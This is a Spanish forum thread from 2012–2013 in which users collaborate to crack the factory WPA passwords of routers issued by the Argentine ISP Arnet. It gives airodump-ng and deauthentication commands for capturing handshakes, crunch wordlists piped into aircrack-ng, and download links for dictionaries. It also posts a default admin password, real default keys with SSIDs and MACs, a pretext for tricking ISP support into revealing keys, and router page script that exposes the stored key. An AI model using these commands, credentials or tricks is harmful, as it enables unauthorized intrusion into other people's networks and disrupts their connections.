Arg-Wireless - El Primer Foro de Wireless de Argentina...

Seguridad Informática => Hacking Wireless => Mensaje iniciado por: infolinuxar en 03 de Septiembre de 2012, 10:35:50 am

Título: Crear Diccionario WPA para ARNET WPA
Publicado por: infolinuxar en 03 de Septiembre de 2012, 10:35:50 am
(http://mla-d2-p.mlstatic.com/imperdible-oferta-modem-arnet-wifi-router-inalambrico-7025-MLA5151048960_102013-F.jpg)

Hola a todos es mi primer post en este foro, antes que nada los quiero felicitar por el sitio.
El motivo de este post es  para mi sorpresa de Arnet de venir usando  una clave tan simple y una encriptación WEP en sus modem/router  la cual era ARNET , Hoy me sorprendió  los equipos que entregan viene con clave WPA  la clave contiene  algo de 10 carácter y está impresa en  la  caja del modem/router, con letras y números las letras en minúscula, intente crackear con diccionarios  y generar un Wordlist pero esto  es imposible tarda muchísimo, necesitaría una súper com[El Usuario ha Insultado]dora.
Lo único que me queda es ver si se filtra algunas clave la otra seria ir posteando las clave que viene por defecto en los equipos y generar un  diccionarios  si les interesa podemos usar este mismo Post para ir, poniendo las claves de los equipos, no se me ocurre otra.....
 
Saludos a todos.



Modelos de Routers:

9C:D2:4B - ZTE Corporation
34:4B:50 - ZTE Corporation
38:46:08 - ZTE Corporation

08:7A:4C - Huawei Technologies Co., Ltd
78:6A:89 - Huawei Technologies Co., Ltd
EC:CB:30 - Huawei Technologies Co., Ltd
14:B9:68 - Huawei Technologies Co., Ltd

28:28:5D - ZyXEL Communications Corporation
FC:F5:28 - ZyXEL Communications Corporation
5C:f4:AB - ZyXEL Communications Corporation
50:67:F0 - ZyXEL Communications Corporation
EC:43:F6 - ZyXEL Communications Corporation

64:2D:AB - <no-se-sabe>
28:28:5C - <no-se-sabe>
3A:7B:C9 - <no-se-sabe>
48:9C:E7 - <no-se-sabe>
4C:AC:25 - <no-se-sabe>
94:85:73 - <no-se-sabe>
9C:C2:4B - <no-se-sabe>

F0:84:2F - ADB Broadband Italia
A4:52:6F - ADB Broadband Italia
74:88:8B - ADB Broadband Italia
00:8C:54 - ADB Broadband Italia
D4:D1:84 - ADB Broadband Italia
A4:5D:A1 - ADB Broadband Italia

38:22:9D - Pirelli Tyre S.p.A.

B4:82:FE - Askey Computer Corp



Historial:

15 de Mayo de 2013 - Primeros datos de posibles WPA's. 1 (http://arg-wireless.com.ar/index.php?topic=1006.msg5518#msg5518) 2 (http://arg-wireless.com.ar/index.php?topic=1006.msg5601#msg5601) 3 (http://arg-wireless.com.ar/index.php?topic=1006.msg5612#msg5612) 4 (http://arg-wireless.com.ar/index.php?topic=1006.msg5648#msg5648) 5 (http://arg-wireless.com.ar/index.php?topic=1006.msg5652#msg5652) 6 (http://arg-wireless.com.ar/index.php?topic=1006.msg5853#msg5853) 7 (http://arg-wireless.com.ar/index.php?topic=1006.msg5867#msg5867) 8 (http://arg-wireless.com.ar/index.php?topic=1006.msg5876#msg5876) 9 (http://arg-wireless.com.ar/index.php?topic=1006.msg5907#msg5907) 10 (http://arg-wireless.com.ar/index.php?topic=1006.msg6013#msg6013) 11 (http://arg-wireless.com.ar/index.php?topic=1006.msg6261#msg6261) 12 (http://arg-wireless.com.ar/index.php?topic=1006.msg6433#msg6433) 13 (http://arg-wireless.com.ar/index.php?topic=1006.msg6551#msg6551) 14 (http://arg-wireless.com.ar/index.php?topic=1006.msg6756#msg6756) 15 (http://arg-wireless.com.ar/index.php?topic=1006.msg6760#msg6760)
05 de Enero de 2015 - Liberado el algoritmo de ADB Pirelli de WIFI-Arnet (http://arg-wireless.com.ar/index.php?topic=1006.msg6766#msg6766)
09 de Enero de 2015 - Modificado el Script. @Nicash Download (http://arg-wireless.com.ar/index.php?topic=1006.msg6780#msg6780)
10 de Enero de 2015 - Compilado para Windows (http://arg-wireless.com.ar/index.php?topic=1006.msg6785#msg6785).
10 de Enero de 2015 - Nueva versión del Script (http://arg-wireless.com.ar/index.php?topic=1006.msg6786#msg6786). Compilado para Windows v1.1 (http://arg-wireless.com.ar/index.php?topic=1006.msg6789#msg6789)
11 de Enero de 2015 - Versión 1.2 del script liberada (http://arg-wireless.com.ar/index.php?topic=1006.msg6812#msg6812). Windows Version (http://arg-wireless.com.ar/index.php?topic=1006.msg6813#msg6813).

Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 03 de Septiembre de 2012, 01:27:47 pm
y habria q ver, muy bueno el dato de que viene en la caja del router; ya q eso indica q por alguna forna generan la clave; habria q verlo bien, pues aparte de venir sin wps activo es medio dificil saber como sacarlo.

un buen dato es que son simplemente 10 digitos segun comentan:
http://www.pcmasmas.com/viewtopic.php?f=2&t=35637&p=277403
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 03 de Septiembre de 2012, 10:55:02 pm
(http://www.adbglobal.com/medias/images/products/pdg_a4001n_revA/pdg_a4001n_reva_perspective_front.png)

Pocos datos por parte del vendedor.. http://www.adamscableequipment.com/uploads/2/6/7/4/2674188/adb_pdg_a4001n_modem_spec_sheet.pdf (http://www.adamscableequipment.com/uploads/2/6/7/4/2674188/adb_pdg_a4001n_modem_spec_sheet.pdf)

Aparte de tener 1036 = 1.000.000.000.000.000.000.000.000.000.000.000.000 (Posibles contraseñas..)
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 04 de Septiembre de 2012, 08:03:30 pm
por lo general el SSID es WiFi-Arnet-NNNN (N=Numeros) y las MAC Address un 90% son D4:D1:84:XX:XX:XX.

Los datos para su configuracion son:

IP: 192.168.1.1/admin.html
usuario: admin
contraseña: CalVxePV1!

Título: Re:Arnet con seguirdad WPA
Publicado por: Mosaiko en 06 de Septiembre de 2012, 03:30:17 am
yo tengo 3 de esos modem, 2 en color blanco y uno en negro y las contraseñas por defecto son: 4 letras minusculas y 6 numeros no correlativos. Pero aun Asi los Wordlist creados son muy grandes.
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 06 de Septiembre de 2012, 01:09:22 pm
igual se achicaria vastante con saber si es que se respetan.. los lugares donde hay letras o numeros.. pasaria de unos 300gb a poco mas de 150gb como mucho..
Título: Re:Arnet con seguirdad WPA
Publicado por: Mosaiko en 06 de Septiembre de 2012, 09:38:57 pm
Aqui pongo en codigo del modem blanco de 2 antenas con seguridad WPA Por defecto: Este es El Codigo Original... El Aporte de cada uno de nosotros hace del exito colectivo. Saludos.
Contraseña: a1004n_a001_ab2_ae
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 06 de Septiembre de 2012, 10:36:56 pm
a1004n_a001_ab2_ae

las contraseñas por defecto son: 4 letras minusculas y 6 numeros no correlativos.

mmm.. ese es el modelo.. mmm.. mucha desconfianza.. jaja
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 02 de Noviembre de 2012, 01:33:21 pm
según me informaron la clave viene especificado detrás del equipo y consta de 9 dígitos y una letras posiblemente mayúscula.  123456789E.
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 08 de Noviembre de 2012, 10:30:06 pm
Algunas nuevas que he visto...

WiFi-Arnet-8231
WiFi-Arnet-aK62
WiFi-Arnet-07090
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 26 de Noviembre de 2012, 06:56:40 pm
Acabo de tomar un WPA Handshake de una "WiFi-Arnet-0X0X0".. vamos a ver que logramos!

Para capturar el WPA Handshake, simplemente hacemos en un terminal:

Código: [Seleccionar]
airodump-ng --bssid <MAC-AP> -c <Canal> -w output <Interfaz->

y luego en otro varias veces esperando un poco hasta que se obtenga el WPA Handshake en Airodump-ng:

Código: [Seleccionar]
aireplay-ng --deauth 10 -a <MAC-AP> -c <MAC-Cliente> <Interfazr>

Voy a realizar pruebas con un diccionario 000000000E-999999999E, (10GB)

Nada por parte de ese dic, seguramente cambia:

Código: [Seleccionar]
crunch 10 10 ABCDEFGHIJKLMNOPQRSTUVWXYZ -t %%%%%%%%%@

Pero serian 266GB.
Título: Re:Arnet con seguirdad WPA
Publicado por: lucaseo en 16 de Diciembre de 2012, 11:40:12 pm
Voy a realizar pruebas con un diccionario 000000000E-999999999E, (10GB)
Pasaste este diccionario? lograste sacar la clave? saludos!
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 17 de Diciembre de 2012, 12:54:57 am
Pasaste este diccionario? lograste sacar la clave? saludos!

Lo deje trabajando unas 3 horas y me case, tardaba aprox. 24hs en pasarlo completo en windows.
Título: Re:Arnet con seguirdad WPA
Publicado por: ElPablo18 en 14 de Febrero de 2013, 02:02:11 am
según me informaron la clave viene especificado detrás del equipo y consta de 9 dígitos y una letras posiblemente mayúscula.  123456789E.

i si creas un diccionario del  1 al 9  y una letra al final?
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 14 de Febrero de 2013, 02:20:33 am
i si creas un diccionario del  1 al 9  y una letra al final?

ahí:

Nada por parte de ese dic, seguramente cambia:

Código: [Seleccionar]
crunch 10 10 ABCDEFGHIJKLMNOPQRSTUVWXYZ -t %%%%%%%%%@

Pero serian 266GB.
Título: Re:Arnet con seguirdad WPA
Publicado por: ElPablo18 en 14 de Febrero de 2013, 02:47:07 am
no entiendo, nunca use crunch
Título: Re:Arnet con seguirdad WPA
Publicado por: ElPablo18 en 14 de Febrero de 2013, 03:29:16 am
yo digo de crear un diccionario que sea con 9 numeros a lo primero y una letra en mayuscula a lo ultimo
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 14 de Febrero de 2013, 03:54:00 am
Te bajas crunch para windows o para linux y ejecutas ese comando en el terminal|consola:

Código: [Seleccionar]
crunch 10 10 ABCDEFGHIJKLMNOPQRSTUVWXYZ -t %%%%%%%%%@

% = 0123456789 (Comenzara por en 000000000 al 999999999)
@ = ABCDEFGHIJKLMNOPQRSTUVWXYZ (Comenzara y le agregara una por una las letras.)
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 06 de Marzo de 2013, 01:13:22 pm
un dato:

Código: [Seleccionar]
Seriel: S120Y37042397
MAC: FCF582EC2B4X
WPA: AE5B2EBD29
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 06 de Marzo de 2013, 08:36:30 pm
Vamos a pensar que esa clave que copie de un router que estaba detrás del mismo es numérica y hexadecimal, tendríamos un diccionario de 10 dígitos con un peso de 4GB, respetando donde aparecen los números y las letras y todo en Mayúscula.

Con Crunch para crear el diccionario:
Código: [Seleccionar]
crunch 10 10 ABCDEF hex -o START -t @@%@%@@@%%

Ataque directo + AirCrack-ng:
Código: [Seleccionar]
crunch 10 10 ABCDEF hex -o -t @@%@%@@@%% | aircrack-ng -a 2 captura.cap -e nombre-de-la-red -b 11:22:33:44:55:66 -w -

Descarga Dic:
AA0A0AAA00-FF9F9FFF99.rar (16.2 MB)
https://mega.co.nz/#!7IQH0CCR!BRniI1MFF1oY2060Gg_RxT-spO4WFXynC8DkY0kTVCM
Título: Re:Arnet con seguirdad WPA
Publicado por: corbxyz en 09 de Marzo de 2013, 02:05:36 am
No se si sea verdad, pero..

En este link http://www.taringa.net/posts/hazlo-tu-mismo/16420933/Modem-zte-zxhn-h108n.html (http://www.taringa.net/posts/hazlo-tu-mismo/16420933/Modem-zte-zxhn-h108n.html) un usuario dice que la contraseña son muchos numeros (?) y que la pass es HA8136914a...

Desafortunadamente no brinda datos sobre la MAC ni sobre el SSID.
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 09 de Marzo de 2013, 01:33:01 pm
y eso dependerá del equipo, yo tuve uno de estos, el tema que no me dejaron conectarlo:

(http://content.buenacuerdo.com.ar/images/46/4689646595.jpg)

no era ese Zte que dice, era uno todo negro sin antena.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 16 de Marzo de 2013, 03:43:11 pm
estoy a punto de realizar una prueba con este dic haber que pasa.  :-[
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Grego en 30 de Marzo de 2013, 03:21:14 pm
Chicos, tratemos de aportar contraseñas de estas redes así adivinamos si cumplen un patrón. La que yo aporto es la siguiente: bsg223w5r3
La que aportaron antes que era HA8136914a no me la creo. No fue serió como lo posteo el chabon en taringa, fue como diciendo "y es más o menos así".
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 30 de Marzo de 2013, 03:56:26 pm
Como que no es muy parecida a la que vi..  :(

Código: [Seleccionar]
AE5B2EBD29
bsg223w5r3
Título: Router/Módem Arnet P.DG A4001N
Publicado por: hackeame_el_msn en 08 de Abril de 2013, 04:19:08 pm
Hola disculpen alguien tiene idea de cual es la contraseña wi-fi por defecto de estos router/modem nuevos que entrega arnet? solo pude saber googleando la contraseña del router,lei por ahi que son aleatorios las contraseñas  pero nose el patron.Alguien sabe algo de este router/modem? x favor si esto no va aca les pido que lo muevan a su seccion correspondiente muchas gracias  8)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 08 de Abril de 2013, 08:12:14 pm
@hackeame_el_msn: te muevo el tema al post dedicado a las WPA Arnet. Por ahora se tienen muy pocos datos, se sabe que es en algunos casos 10 dígitos.-
Título: Re:Arnet con seguirdad WPA
Publicado por: nyko513 en 19 de Abril de 2013, 06:04:56 pm
Lo deje trabajando unas 3 horas y me case, tardaba aprox. 24hs en pasarlo completo en windows.

D3M0N pasame el diccionario (o el comando en crunch para crearlo desde donde dejaste vos) y el .cap.. y lo termino de pasar! si queres.. saludos..
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: disanramon en 08 de Mayo de 2013, 09:55:45 pm
Muchachos hola. soy nuevo, pero quiero aportar una contraseña que saqué con Reaver (tenia WPS activado):
ESSID: WIFIHERRERA
WPA: 19500114HV
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: jgcastillos en 15 de Mayo de 2013, 03:32:25 pm
Clave que me vino en el router Zyxel de ARNET (hace 3 dias)

Red Wi-Fi:  WiFi-Arnet-936c
Clave:       9C36CBC3AA


Ahora me doy cuenta, que en mis alrededores hay una red que se llama WiFi-Arnet-147i


¿Alguien encontrón algo? Sirve lo que les pongo acá??
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 15 de Mayo de 2013, 08:38:24 pm
Por ahora podemos afirmar que las contraseñas están conformadas con 10 caracteres, comparando el que has aportado y el que he visto ambas contraseñas contienen 4 números y 6 caracteres, por lo general se podría probar un diccionario HEX de 10 dígitos.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: disanramon en 18 de Mayo de 2013, 11:20:45 pm
Por ahora podemos afirmar que las contraseñas están conformadas con 10 caracteres, comparando el que has aportado y el que he visto ambas contraseñas contienen 4 números y 6 caracteres, por lo general se podría probar un diccionario HEX de 10 dígitos.
Y de cuantos GBs estariamos hablando que pesaria ese diccionario Hex de 10 digitos amigo?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 18 de Mayo de 2013, 11:38:43 pm
y 10GB según creo-
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: charlest0n en 30 de Mayo de 2013, 05:30:35 pm
Se me ocurre lo siguiente, aquellos que tengan Arnet con este router, llamar a atención al Cliente y decirle al de Soporte Técnico un chamuyo del estilo:

Hola, yo perdí la clave de Wifi que la tenía anotada en un papel y ahora no lo encuentro. Reinicie el router a configuración de fábrica, pero alguien borró la parte de la etiqueta donde estaba la contraseña, ¿cuál es la contraseña de fábrica de mi equipo?

Quizás allí soliciten algún dato en particular del equipo, y allí podemos ver si existe alguna relación funcional que nos permita buscar una ingeniería inversa. ¿Les parece viable?, saludos!

Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 30 de Mayo de 2013, 08:26:12 pm
Los de soporte ni saben que es un router.. jaja
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: charlest0n en 31 de Mayo de 2013, 12:00:34 am
Los de soporte ni saben que es un router.. jaja

Jajaja, si eso a darlo por descontado. Pero alguna solución te tienen que dar, que no sea enviarte otro router.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: sebabasa en 02 de Junio de 2013, 01:31:11 pm
Nadie mas lo noto?

Citar
Red Wi-Fi:  WiFi-Arnet-936c
Clave:       9C36CBC3AA

 :o
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 02 de Junio de 2013, 06:20:41 pm
@sebabasa puede ser, pero justo en este caso solamente que tenga un parecido de dígitos el SSID con la contraseña.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 18 de Junio de 2013, 09:11:58 pm
Se me dio por buscar el mercadolibre el famoso router Zte que están entregando ahora, que viene con WPS activo pero es muy complicado de crackear pues el mismo se bloquea cada 10 intentos por aproximadamente unas 72hs.

(http://i.minus.com/ibhyAes8p8C2xn.jpg)
(http://i.minus.com/iT4yqT8AGarXr.jpg)

No tenemos detalle del pin expresado en el equipo pero podemos ver la clave WPA.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 18 de Junio de 2013, 09:42:55 pm
Analizando con mas profundidad podemos determinar que todas las claves WPA son de 10 digitos, mayormente numéricos de 7 a 9 caracteres.



Usuario y Contraseña Nuevos Modems/Routers Arnet (ADB A4001N y ZTE H108N )
Interfaz Arnet: http://192.168.1.1/
Interfaz Real: http://192.168.1.1/admin.html
Usuario: admin
Contraseña: CalVxePV1!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 24 de Junio de 2013, 05:11:53 am
Noticias, les traigo noticias!!!

A un amigo mio le instalaron el nuevo pack de Arnet Wi-Fi + ArnetPlay y como necesitaba internet me paso la contraseña y me encontré con:

(http://i.minus.com/ibMSBMqA04yeO.png)

Una serie de números similares al de las imágenes tomadas de mercadolibre. los datos de la red eran: WiFi-Arnet-LLNN y la contraseña era: LLL3456789, muy similar al de mercadolibre pero con la diferencia que uno comienza con 3 y termina con 9 y el otro comienza con 2 y termina con 8: LLL2345678.-

Ya con esto tenemos un indicio, pueda que sirva para algunas redes.

Referencias:
L = Letra Mayuscula.
N = Numero.

NOTA: La aplicación de Android se llama: "Recupera Contraseña WiFi (http://www.arg-wireless.com.ar/index.php/topic,1324.0.html)".



Otra similitud que encontré fue la siguiente:

Como habíamos hablado de la serie de números, esto tiene que ver con el SSID:

La de MercadoLibre:
SSID: WiFi-Arnet-7148
PASS: LLL2345678

La mia:
SSID: WiFi-Arnet-LLN9
PASS: LLL3456789



Les dejo los diccionarios:

Códigos de Crunch:
Código: [Seleccionar]
crunch 10 10 ABCDEFGHIJKLMNOPQRSTUVWXYZ hex -o START -t @@@2345678
crunch 10 10 abcdefghijklmnopqrstuvwxyz hex -o START -t @@@2345678
crunch 10 10 ABCDEFGHIJKLMNOPQRSTUVWXYZ hex -o START -t @@@3456789
crunch 10 10 abcdefghijklmnopqrstuvwxyz hex -o START -t @@@3456789

Packs para descargar:

DIC-MAYUS-ARNET-WPA.rar (1 KB)
https://mega.co.nz/#!iQJyHJaA!HUYsdWsjbbEHpWcuNTyX0kQk6noCV7sMCUxtaGcxQTo (https://mega.co.nz/#!iQJyHJaA!HUYsdWsjbbEHpWcuNTyX0kQk6noCV7sMCUxtaGcxQTo)

DIC-MINUS-ARNET-WPA.rar (1 KB)
https://mega.co.nz/#!WVpkATII!MRM5_UCw2JfDGO_UJ0xwiTBOQydaV6RCkQSQKB4e1Bo (https://mega.co.nz/#!WVpkATII!MRM5_UCw2JfDGO_UJ0xwiTBOQydaV6RCkQSQKB4e1Bo)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: christian32 en 27 de Junio de 2013, 09:08:12 pm
Hola a todos.
Aporto los datos que encontre en mercado libre.

ZTE ZXHN H108N
WLAN SSID: WiFi-Arnet-WMC8
WLAN Security (WPA-PSK): cYOE999pK9

Pido disculpas porque no se si subi la foto correctamente, pero agrego la dirección donde se la puede ver.

 http://articulo.mercadolibre.com.ar/MLA-463369693-modem-adsl-wi-fi-arnet-zte-zxhn-h108n-en-oferta-_JM

(http://bimg1.mlstatic.com/modem-adsl-wi-fi-arnet-zte-zxhn-h108n-en-oferta_MLA-F-3980202425_032013.jpg)

saludos.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: hackeame_el_msn en 04 de Julio de 2013, 06:07:14 pm
Ya no se que pensar  :( primero pense que el patron era 6 letras mayusculas y 4 numeros...despues veo contraseñas con esa caracteristica pero en ningun orden (osea aleatorio)... ahora una mezcla de mayusculas con minusculas...  ??? cual es el patron? alguien tiene una idea?   :'( supongo que por las mac's (primero 6 digitos) tendriamos que ver...si cumplen algun patron....las que tienen las mac's iguales (primeros 6 digitos) a ver si existe algun indicio.....de ultima habria que hacer ingenieria inversa a un modem de esta caracteristica para ver si trae un algoritmo de generacion de datos preconfigurados... he visto muchas redes que dejan por defecto los parametros pre-establecidos por su ISP (Wifi-Arnet-xxxx ) lo que da a pensar que con la contraseña tambien pasaria eso.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: christian32 en 17 de Julio de 2013, 08:50:21 pm
Continuo aportando mas datos que encontré en mercado libre.

ZTE ZXHN H108N
WLAN SSID: WiFi-Arnet-1841
WLAN Security (WPA-PSK): 1852852963
MAC: B4:B3:62:6D:E0.1A - B4:B3:62:6D:E0:20

http://articulo.mercadolibre.com.ar/MLA-461291367-mar-del-plata-modem-router-wi-fi-usb-zte-_JM (http://articulo.mercadolibre.com.ar/MLA-461291367-mar-del-plata-modem-router-wi-fi-usb-zte-_JM)

(http://bimg2.mlstatic.com/mar-del-plata-modem-router-wi-fi-usb-zte_MLA-F-4339857922_052013.jpg)

Lamentablemente la siguiente imagen tiene una pobre definición, los datos parecen ser:

ZTE ZXHN H108N
WLAN SSID: WiFi-Arnet-4703
WLAN Security (WPA-PSK): 5040372nl5
MAC: B4:74:2A:20:5D:FF - B4:74:2A:20:BE:05

http://articulo.mercadolibre.com.ar/MLA-457026287-modem-arnet-wifi-zte-zte-zxhn-h108n-nuevo-en-caja-sin-uso-_JM (http://articulo.mercadolibre.com.ar/MLA-457026287-modem-arnet-wifi-zte-zte-zxhn-h108n-nuevo-en-caja-sin-uso-_JM)

(http://img1.mlstatic.com/modem-arnet-wifi-zte-zte-zxhn-h108n-nuevo-en-caja-sin-uso_MLA-O-4146127433_042013.jpg)

Saludos.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 17 de Julio de 2013, 10:43:16 pm
Gracias por tu aporte @christian32, por ahora estamos a cada vez menos porcentaje de poder sacarla, pero sabemos básicamente como podría se la pass real.. no hay muchas que concuerden pero de apoco la vamos a ir sacando.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Grueso Calibre en 17 de Julio de 2013, 11:14:04 pm
Hoy me topé con un router Zykel 1312 cuya clave por defecto era la siguiente:

11AC479T9H

Estos modelos son los que está poniendo ARNET en San Francisco.

Saludos.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: christian32 en 18 de Julio de 2013, 09:55:38 pm
Continuo aportando mas datos que encontré en mercado libre.

ZTE ZXHN H108N
WLAN SSID: WiFi-Arnet-F85q
WLAN Security (WPA-PSK): 639528417U
MAC: B4:74:2A:20:C6:99 - B4:74:2A:20:C6:9F

http://articulo.mercadolibre.com.ar/MLA-463754881-modem-adsl-wi-fi-arnet-zte-zxhn-h108-_JM (http://articulo.mercadolibre.com.ar/MLA-463754881-modem-adsl-wi-fi-arnet-zte-zxhn-h108-_JM)

(http://bimg1.mlstatic.com/modem-adsl-wi-fi-arnet-zte-zxhn-h108_MLA-F-4444311470_062013.jpg)

Saludos.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 18 de Julio de 2013, 10:37:59 pm
@christian32 ya teníamos ese patrón correspondiente, por ahora sabemos que el primero es NNNNNNNNNL (N = Numeros | L = Letras), el segundo que sabemos es LLLNNNNNNN (N = Numeros | L = Letras); los que se han repetido varias veces.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 14 de Agosto de 2013, 08:35:36 pm
Buenas, tuve la suerte de cruzarme uno de los routers nuevos de Arnet y tome este pequeño JS de su fuente:

MAC= 74:88:8B:07:AB:0E
WPS= 82435707 (No viene Activo)
WPA= 3c5xx646ak

Código: [Seleccionar]
<script language="javascript">
parent.document.getElementsByName("basefrm")[0].height="300";
<!-- hide
var unitNum = 0;
/*LegacyGuest*/
var ssid = 'WiFi-Arnet-5569';
var wlRefresh = '0';
var wepkey = "3c5xx";
var wpaPskKey = '3c5xx646ak';
var wep = 'disabled';
var wpa = 'aes';
var auth = '0';
var mode = 'psk';
var bit = '1';
var keys = "3c5xx";

if ( wlRefresh == '1' ) {
   var code = 'location="wlcfgrefresh_u.wl?wlRefresh=0"';
   eval(code);   
}

function print_help_text(){
   with ( document.forms[0] ){
      switch (wlType.selectedIndex){
        case 0:
            display_text="<br>";
            break;
        case 1:
            display_text="Para cambiar la contrase&ntilde;a deber&aacute;s elegir una</br> combinaci&oacute;n alfanum&eacute;rica con una longitud de 5 caracteres";
            break;
        case 2:
            display_text="Para cambiar la contrase&ntilde;a deber&aacute;s elegir una</br> combinaci&oacute;n alfanum&eacute;rica con una longitud de 13 caracteres";
            break;
        case 3:
        case 4:
        case 5:
            display_text="Para cambiar la contrase&ntilde;a deber&aacute;s elegir una</br> combinaci&oacute;n alfanum&eacute;rica con una longitud minima de 8 caracteres y m&aacute;xima de 63 caracteres";
            break;
        default:
            display_text="<br>";
            break;
      }
      display_text+="<br>";
      display_text+="<br>";
      document.getElementById('usertext').innerHTML=display_text;
   }
}

function frmLoad() {

   with ( document.forms[0] ) {
      wlSsid.value = ssid;
      if (mode=='shared')
      {
         if (wep=='enabled') {
            if (bit == 1) {
               wlType.selectedIndex = 1;
               wlpassword.size = 10;
               wlpassword.value = wepkey;
            } else {
              wlType.selectedIndex = 2;
              wlpassword.size = 15;
              wlpassword.value = wepkey;
            }
         }else{
            wlpassword.value = "";
            wlpassword.disabled = "disabled";
         }
      }
      else if(mode=='open')
         if (wep=='enabled') {
            if (bit == 1) {
               wlType.selectedIndex = 1;
               wlpassword.size = 10;
               wlpassword.value = wepkey;
            } else {
              wlType.selectedIndex = 2;
              wlpassword.size = 15;
              wlpassword.value = wepkey;
            }
         }else{
            wlpassword.value = "";
            wlpassword.disabled = "disabled";
         }
      else if (mode=="psk"){
         wlpassword.disabled=false;
         wlpassword.size = 32;
         wlpassword.value = wpaPskKey;
         if (wpa=="tkip")
             wlType.selectedIndex=3;
         else if (wpa=="aes")
             wlType.selectedIndex=4;
      } else if (mode=="psk2"){
         wlType.selectedIndex =5;
         wlpassword.disabled=false;
         wlpassword.size = 32;
         wlpassword.value = wpaPskKey;
      }else{
          wlType.selectedIndex = 0;
          wlpassword.disabled = "disabled";
      }
      print_help_text();
   }
}

function btnApply() {
   var loc = 'wlbasic.wl?';
   
   with ( document.forms[0] ) {
      loc += 'wlSsidIdx=0';
      loc += '&wlSsid=' + wlSsid.value;
      switch (wlType.selectedIndex)
      {
         case 1:
               if (wlpassword.value.length!=5){
               alert('La clave de seguridad WEP debe tener una longitud de 5 caracteres');
               return;
               }
           break;
         case 2:
               if (wlpassword.value.length!=13){
               alert('La clave de seguridad WEP debe tener una longitud de 13 caracteres');
               return;
               }
            break;
         case 3:
         case 4:
         case 5:
            if (wlpassword.value.length>=64 ||wlpassword.value.length<=7 ){
            alert('La clave de seguridad WPA debe tener una longitud minima de 8 y maxima de 63 caracteres');
            return;
            }
            break;
      }
      switch (wlType.selectedIndex)
      {
         case 0:
            loc += '&wlAuthMode=open';
            loc += '&wlAuth=0';
            loc += '&wlWep=disabled';
            break;
         case 1:
            loc += '&wlAuthMode=open';
            loc += '&wlAuth=0';
            loc += '&wlWep=enabled';
            loc += '&wlKeyBit=1';
            loc += '&wlKey1=' + encodeUrl(wlpassword.value);
            break;
         case 2:
            loc += '&wlAuthMode=open';
            loc += '&wlAuth=0';
            loc += '&wlWep=enabled';
            loc += '&wlKeyBit=0';
            loc += '&wlKey1=' + encodeUrl(wlpassword.value);
            break;
         case 3:
            loc += '&wlAuthMode=psk';
            loc += '&wlAuth=0';
            loc += '&wlWep=disabled';
            loc += '&wlWpaPsk=' + encodeUrl(wlpassword.value);
            loc += '&wlWpaGtkRekey=0';
            loc += '&wlKeyBit=1';
            loc += '&wlPreauth=1';
            loc += '&wlWpa=tkip';
            break;
         case 4:
            loc += '&wlAuthMode=psk';
            loc += '&wlAuth=0';
            loc += '&wlWep=disabled';
            loc += '&wlWpaPsk=' + encodeUrl(wlpassword.value);
            loc += '&wlWpaGtkRekey=0';
            loc += '&wlKeyBit=1';
            loc += '&wlPreauth=1';
            loc += '&wlWpa=aes';
            break;
         case 5:
            loc += '&wlAuthMode=psk2';
            loc += '&wlAuth=0';
            loc += '&wlWep=disabled';
            loc += '&wlWpaPsk=' + encodeUrl(wlpassword.value);
            loc += '&wlWpaGtkRekey=0';
            loc += '&wlKeyBit=1';
            loc += '&wlPreauth=1';
            loc += '&wlWpa=aes';
            break;
      }
   }
   loc += '&sessionKey=2032772992';
   var code = 'location="' + loc + '"';
   eval(code);
}

function wifiTypeSelected(){
   with ( document.forms[0] ) {
      switch (wlType.selectedIndex)
      {
         case 0:
            wlpassword.disabled="disabled";
            break;
         case 1:
            wlpassword.disabled=false;
            wlpassword.size=10;
            wlpassword.value=keys;
            break;
         case 2:
            wlpassword.disabled=false;
            wlpassword.size=15;
            wlpassword.value=keys;
            break;
         case 3:
            wlpassword.disabled=false;
            wlpassword.size=32;
            wlpassword.value=wpaPskKey;
            break;
         case 4:
            wlpassword.disabled=false;
            wlpassword.size=32;
            wlpassword.value=wpaPskKey;
         case 5:
            wlpassword.disabled=false;
            wlpassword.size=32;
            wlpassword.value=wpaPskKey;
            break;
      }
      print_help_text();
   }
}

-->
